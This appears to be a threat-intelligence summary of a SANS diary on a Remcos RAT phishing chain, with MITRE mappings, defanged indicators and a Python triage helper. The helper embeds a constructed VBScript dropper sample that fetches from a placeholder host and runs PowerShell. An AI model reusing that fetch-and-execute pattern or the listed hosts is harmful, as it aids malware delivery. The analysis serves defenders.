Remcos RAT was delivered via a phishing email carrying a double-compressed archive that unpacks to an obfuscated VBScript dropper. The dropper uses a COM object (MSXML2.XMLHTTP.3.0) to fetch a PowerShell-based payload and culminates in a Remcos payload contacting a remote C2. #RemcosRAT #kastex.me #srbizasrbe.org #notme.linkpc.net
Keypoints
- The delivery route begins with a phishing email pretending to relate to a purchase order, with a file named “P0-65774383__pdf.tar.lz” attached.
- The attachment uses a double extension (.tar.lz); the analyst unpacked it with lunzip on a REMnux system, an unusual delivery format.
- The extracted content includes a VBScript file “Protected Client.vbs” that is obfuscated.
- The VBScript leverages a GetObject call to an ActiveX component (MSXML2.XMLHTTP.3.0) to retrieve remote content and run a PowerShell payload.
- The PowerShell payload is hex-encoded and decodes into commands that download and execute further payloads from remote URLs.
- A Remcos RAT sample is ultimately dropped and communicates with a C2 server at notme.linkpc.net:4376.
- The campaign yields several IOCs (hashes, domains, and URLs) and demonstrates a multi-stage delivery chain combining scripting, obfuscation, and client-side object abuse.
MITRE Techniques
- [T1566.001] Phishing: Attachment – Delivered via email attachment pretending to be related to a purchase order. Quote: “The file was received as an attachment to a mail that pretended to be related to a purchase order.”
- [T1036] Masquerading – The attachment name embeds "pdf" before a double extension (.tar.lz); the archive can be processed with lunzip on REMnux. Quote: “Note the double extension; it can be processed with lunzip on REMnux:”
- [T1059.005] VBScript – The Protected Client.vbs script is obfuscated. Quote: “The ‘Protected Client.vbs’ script is nicely obfuscated.”
- [T1027.001] Obfuscated/Compressed Files and Information – Sensitive strings are encoded/decoded via hex-encoding. Quote: “Sensitive strings (that could reveal the purpose of the script) are encoded and decoded using the following function: … It’s a simple hex-encoding!”
- [T1059.001] PowerShell – The payload is hex-encoded and executed via PowerShell after decoding. Quote: “The file contains a Powershell payload, again hex-encoded:”
- [T1105] Ingress Tool Transfer – Malicious content is loaded from a remote URL to populate the object. Quote: “The object is populated with malicious content loaded from the following URL:”
- [T1071.001] Web Protocols – Remcos RAT uses HTTP-based C2 (notme.linkpc.net:4376). Quote: “it’s a Remcos RAT sample (C2: notme[.]linkpc[.]net:4376).”
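As an added defender-side example (not code from the diary or the dropper itself), the Python triage helper below pulls hex-encoded string literals out of a VBScript dropper, decodes them the same way the diary's simple hex-decode function does, and flags the MSXML2.XMLHTTP ProgID, embedded URLs and a PowerShell launch in the decoded output. The script fragment, the helper name dx and the example.invalid host are constructed placeholders, not the real "Protected Client.vbs".

```python
import re

# Constructed VBScript fragment (NOT the real "Protected Client.vbs") that
# mirrors the pattern the diary describes: hex-encoded string literals fed to
# a decode helper, and a GetObject() on the MSXML2.XMLHTTP.3.0 ProgID.
# The hostname example.invalid is a placeholder.
SAMPLE_VBS = '''
Function dx(h)
  For i = 1 To Len(h) Step 2
    dx = dx & Chr("&H" & Mid(h, i, 2))
  Next
End Function
Set o = GetObject("new:MSXML2.XMLHTTP.3.0")
o.Open dx("474554"), dx("687474703a2f2f6578616d706c652e696e76616c69642f782e6a7067"), False
o.Send
Execute dx("706f7765727368656c6c2e657865202d6e6f70")
'''

# A quoted literal made only of hex digits, at least 3 bytes long.
HEX_LITERAL = re.compile(r'"([0-9A-Fa-f]{6,})"')


def decode_hex_literals(script: str) -> list[str]:
    """Decode every even-length hex string literal, in order of appearance."""
    out = []
    for m in HEX_LITERAL.finditer(script):
        h = m.group(1)
        if len(h) % 2:          # odd length cannot be a byte string; skip it
            continue
        out.append(bytes.fromhex(h).decode("latin-1"))
    return out


def triage(script: str) -> dict:
    """Summarise what the dropper reveals once its hex literals are decoded."""
    decoded = decode_hex_literals(script)
    text = script + "\n" + "\n".join(decoded)   # search raw + decoded text
    return {
        "decoded": decoded,
        "urls": re.findall(r"https?://[^\s\"']+", text),
        "uses_xmlhttp": "MSXML2.XMLHTTP" in text,
        "launches_powershell": "powershell" in text.lower(),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBS).items():
        print(f"{key}: {value}")
```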
Indicators of Compromise
- [Hash] ea91dc0fdd99aab9e990b6520c136fc2f0c19b4ba82691ceef853ad4a86c0141 – Initial attachment’s SHA256 for P0-65774383__pdf.tar.lz
- [Hash] 8e41caaf8c87e94296783d9907fa170e696175ff46a57584d04df6867b1cfab1 – Remcos payload SHA256
- [Domain] kastex.me – Domain hosting malicious content used in the dropper/payload chain
- [Domain] srbizasrbe.org – Domain involved in hosting payload content referenced by the drop chain
- [Domain] notme.linkpc.net – C2 domain used by the Remcos payload
- [URL] hxxp://kastex[.]me/bkp/ybn.jpg – URL used to deliver/load payload content
- [URL] hxxp://www[.]srbizasrbe[.]org/zts/ytk.jpg – Additional URL referenced in the chain
- [File name] P0-65774383__pdf.tar.lz – Original double-extension archive name delivering the dropper
- [File name] Protected Client.vbs – Obfuscated dropper script used in execution chain
Read more: https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/